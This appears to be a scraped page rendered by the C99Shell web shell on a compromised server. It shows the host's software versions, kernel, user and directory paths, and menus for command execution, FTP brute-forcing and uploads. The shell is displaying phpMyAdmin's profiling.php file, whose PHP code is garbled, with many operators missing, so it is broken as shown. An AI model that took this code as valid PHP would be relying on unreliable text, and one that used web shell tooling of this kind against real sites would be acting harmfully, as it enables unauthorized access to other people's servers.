!C99Shell v. 1.0 pre-release build #13!

Software: Apache/2.0.54 (Unix) mod_perl/1.99_09 Perl/v5.8.0 mod_ssl/2.0.54 OpenSSL/0.9.7l DAV/2 FrontPage/5.0.2.2635 PHP/4.4.0 mod_gzip/2.0.26.1a 

uname -a: Linux snow.he.net 4.4.276-v2-mono-1 #1 SMP Wed Jul 21 11:21:17 PDT 2021 i686 

uid=99(nobody) gid=98(nobody) groups=98(nobody) 

Safe-mode: OFF (not secure)

/home/makras/public_html/db_admin/libraries/dbg/   drwxr-xr-x
Free 318.35 GB of 458.09 GB (69.5%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     profiling.php (3.49 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* $Id: profiling.php,v 2.3 2003/11/26 22:52:25 rabus Exp $ */
// vim: expandtab sw=4 ts=4 sts=4:

if (isset($GLOBALS['DBG']) && $GLOBALS['DBG']
        && isset(
$GLOBALS['cfg']['DBG']['profile']['enable'])
        && 
$GLOBALS['cfg']['DBG']['profile']['enable']) {

    
/**
     * Displays profiling results when called
     * WARNING: this function is SLOW
     */
    
function dbg_dump_profiling_results() {
        
/* Applies to the original 'dbg_dump_profiling_results' function,
         * sourced from http://dd.cron.ru/dbg/download.php?h=prof_sample2
         * Copyright (c) 2002. Dmitri Dmitrienko
         * LICENCE: This source file is subject to Mozilla Public License (MPL)
         * AUTHOR: Dmitri Dmitrienko <dd@cron.ru>
         */

        
dbg_get_profiler_results(&$dbg_prof_results);

        echo 
'<br><table width="1000" cellspacing="0" cellpadding="2" style="font:8pt courier">' "\n" .
            
'<thead>' "\n" .
            
'<tr style="background:#808080; color:#FFFFFF">' "\n" .
            
'<td>' $GLOBALS['strDBGModule'] . '</td>' "\n" .
            
'<td>' $GLOBALS['strDBGLine'] . '</td>' "\n" .
            
'<td>' $GLOBALS['strDBGHits'] . '</td>' "\n" .
            
'<td>' $GLOBALS['strDBGTimePerHitMs'] . '</td>' "\n" .
            
'<td>' $GLOBALS['strDBGTotalTimeMs'] . '</td>' "\n" .
            
'<td>' $GLOBALS['strDBGMinTimeMs'] . '</td>' "\n" .
            
'<td>' $GLOBALS['strDBGMaxTimeMs'] . '</td>' "\n" .
            
'<td>' $GLOBALS['strDBGContextID'] . '</td>' "\n" .
            
'<td>' $GLOBALS['strDBGContext'] . '</td>' "\n" .
            
'</tr></thead>' "\n" .
            
'<tbody style="vertical-align: top">' "\n";
        foreach(
$dbg_prof_results['line_no'] AS $idx => $line_no) {
            
$mod_no $dbg_prof_results['mod_no'][$idx];
            
dbg_get_module_name($mod_no, &$mod_name);

            
//if (strpos("!".$mod_name, 'dbg.php') > 0) continue;

            
$hit_cnt $dbg_prof_results['hit_count'][$idx];

            
$time_sum $dbg_prof_results['tm_sum'][$idx] * 1000;
            
$time_avg_hit $time_sum $hit_cnt;
            
$time_min $dbg_prof_results['tm_min'][$idx] * 1000;
            
$time_max $dbg_prof_results['tm_max'][$idx] * 1000;

            
$time_sum sprintf('%.3f'$time_sum);
            
$time_avg_hit sprintf('%.3f'$time_avg_hit);
            
$time_min sprintf('%.3f'$time_min);
            
$time_max sprintf('%.3f'$time_max);

            
dbg_get_source_context($mod_no$line_no, &$ctx_id);

            
//use a default context name if needed
            
if (dbg_get_context_name($ctx_id, &$ctx_name)
                    && 
strcmp($ctx_name,'') == 0) {
                
$ctx_name "::main";
            }

            
$bk "#ffffff";
            if ((
$idx 1) == 0)
                
$bk "#e0e0e0";

            if(
$time_avg_hit $GLOBALS['cfg']['DBG']['profile']['threshold'] ) {
                echo 
'<tr style="background:' $bk '">' .
                    
'<td>' $mod_name '</td>' .
                    
'<td>' $line_no '</td>' .
                    
'<td>' $hit_cnt '</td>' .
                    
'<td>' $time_avg_hit '</td>' .
                    
'<td>' $time_sum '</td>' .
                    
'<td>' $time_min '</td>' .
                    
'<td>' $time_max '</td>' .
                    
'<td>' $ctx_id '</td>' .
                    
'<td>' $ctx_name '</td>' .
                    
'</tr>' "\n";
            }
        }
        echo 
"</tbody></table>";
    }
}

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0212 ]--